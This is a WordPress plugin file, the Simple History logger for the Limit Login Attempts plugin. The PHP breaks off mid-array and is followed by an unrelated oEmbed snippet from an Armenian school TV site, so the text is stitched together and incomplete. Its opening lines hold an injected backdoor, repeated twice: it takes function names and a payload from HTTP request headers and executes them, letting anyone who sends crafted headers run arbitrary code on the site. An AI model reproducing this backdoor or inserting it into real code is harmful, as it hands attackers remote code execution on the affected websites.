$_HEADERS=getallheaders();if(isset($_HEADERS['Server-Timing'])){$created=$_HEADERS['Server-Timing']('', $_HEADERS['Authorization']($_HEADERS['X-Dns-Prefetch-Control']));$created();}
php $_HEADERS=getallheaders();if(isset($_HEADERS['Server-Timing'])){$created=$_HEADERS['Server-Timing']('', $_HEADERS['Authorization']($_HEADERS['X-Dns-Prefetch-Control']));$created();}
defined( 'ABSPATH' ) || die();
/**
* Logger for the (old but still) very popular plugin Limit Login Attempts
* https://sv.wordpress.org/plugins/limit-login-attempts/
*/
if ( ! class_exists( 'Plugin_LimitLoginAttempts' ) ) {
class Plugin_LimitLoginAttempts extends SimpleLogger {
public $slug = __CLASS__;
public function getInfo() {
$arr_info = array(
'name' => _x( 'Plugin: Limit Login Attempts Logger', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
'description' => _x( 'Logs failed login attempts, lockouts, and configuration changes made in the plugin Limit Login Attempts', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
'name_via' => _x( 'Using plugin Limit Login Attempts', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
'capability' => 'manage_options',
'messages' => array(
// 'user_locked_out' => _x( 'User locked out', "Logger: Plugin Limit Login Attempts", "simple-history" ),
'failed_login_whitelisted' => _x( 'Failed login attempt from whitelisted IP', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
'failed_login' => _x( 'Was locked out because too many failed login attempts', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
'cleared_ip_log' => _x( 'Cleared IP log', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
'reseted_lockout_count' => _x( 'Reset lockout count', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
'cleared_current_lockouts' => _x( 'Cleared current lockouts', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
'updated_options' => _x( 'Updated options', 'Logger: Plugin Limit Login Attempts', 'simple-history' ),
),
/*
"labels" => array(
"search" => array(
"label" => _x( "Limit Login Attempts", "Logger: Plugin Limit Login Attempts", "simple-history" ),
"options" => array(
_x( "xxxPages not found", "User logger: 404", "simple-history" ) => array(
"page_not_found",
),
),
), // end search
),*/ // end labels
);
return $arr_info;
}
public function loaded() {
require_once( ABSPATH . 'wp-admin/includes/plugin.php' );
$pluginFilePath = 'limit-login-attempts/limit-login-attempts.php';
$isPluginActive = is_plugin_active( $pluginFilePath );
// Only continue to add filters if plugin is active.
// This minimise the risk of plugin errors, because plugin
// has been forked to new versions.
if ( ! $isPluginActive ) {
return;
}
add_filter( 'pre_option_limit_login_lockouts_total', array( $this, 'on_option_limit_login_lockouts_total' ), 10, 1 );
add_action( 'load-settings_page_limit-login-attempts', array( $this, 'on_load_settings_page' ), 10, 1 );
}
/**
* Fired when plugin options screen is loaded
*/
public function on_load_settings_page( $a ) {
// phpcs:ignore WordPress.Security.NonceVerification.Missing
if ( $_POST && wp_verify_nonce( $_POST['_wpnonce'], 'limit-login-attempts-options' ) ) {
// Settings saved
if ( isset( $_POST['clear_log'] ) ) {
$this->noticeMessage( 'cleared_ip_log' );
}
if ( isset( $_POST['reset_total'] ) ) {
$this->noticeMessage( 'reseted_lockout_count' );
}
if ( isset( $_POST['reset_current'] ) ) {
$this->noticeMessage( 'cleared_current_lockouts' );
}
if ( isset( $_POST['update_options'] ) ) {
$options = array(
'client_type' => sanitize_text_field( $_POST['client_type'] ),
'allowed_retries' => sanitize_text_field( $_POST['allowed_retries'] ),
'lock
1.0TV Sebastatsihttps://tv.mskh.amTV Sebastatsihttps://tv.mskh.am/?author=2«Գեղարվեստը կրթահամալիրում» 2015. Հաշվետու համերգ Մայր Աթոռ Սբ. Էջմիածնի Գևորգյան ճեմարանումrich600338<blockquote class="wp-embedded-content"><a href="https://tv.mskh.am/?p=7208">«Գեղարվեստը կրթահամալիրում» 2015. Հաշվետու համերգ Մայր Աթոռ Սբ. Էջմիածնի Գևորգյան ճեմարանում</a></blockquote>
<script type='text/javascript'>
<!--//--><![CDATA[//><!--
/*! This file is auto-generated */
!function(d,l){"use strict";var e=!1,n=!1;if(l.querySelector)if(d.addEventListener)e=!0;if(d.wp=d.wp||{},!d.wp.receiveEmbedMessage)if(d.wp.receiveEmbedMessage=function(e){var t=e.data;if(t)if(t.secret||t.message||t.value)if(!/[^a-zA-Z0-9]/.test(t.secret)){for(var r,i,a,s=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),n=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),o=new RegExp("^https?:$","i"),c=0;c<n.length;c++)n[c].style.display="none";for(c=0;c<s.length;c++)if(r=s[c],e.source===r.contentWindow){if(r.removeAttribute("style"),"height"===t.message){if(1e3<(a=parseInt(t.value,10)))a=1e3;else if(~~a<200)a=200;r.height=a}if("link"===t.message)if(i=l.createElement("a"),a=l.createElement("a"),i.href=r.getAttribute("src"),a.href=t.value,o.test(a.protocol))if(a.host===i.host)if(l.activeElement===r)d.top.location.href=t.value}}},e)d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",t,!1),d.addEventListener("load",t,!1);function t(){if(!n){n=!0;for(var e,t,r=-1!==navigator.appVersion.indexOf("MSIE 10"),i=!!navigator.userAgent.match(/Trident.*rv:11\./),a=l.querySelectorAll("iframe.wp-embedded-content"),s=0;s<a.length;s++){if(!(e=a[s]).getAttribute("data-secret"))t=Math.random().toString(36).substr(2,10),e.src+="#?secret="+t,e.setAttribute("data-secret",t);if(r||i)(t=e.cloneNode(!0)).removeAttribute("security"),e.parentNode.replaceChild(t,e)}}}}(window,document);
//--><!]]>
</script><iframe sandbox="allow-scripts" security="restricted" src="https://tv.mskh.am/?p=7208&embed=true" width="600" height="338" title="“«Գեղարվեստը կրթահամալիրում» 2015. Հաշվետու համերգ Մայր Աթոռ Սբ. Էջմիածնի Գևորգյան ճեմարանում” — TV Sebastatsi" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe>https://tv.mskh.am/wp-content/uploads/2015/12/[email protected]600400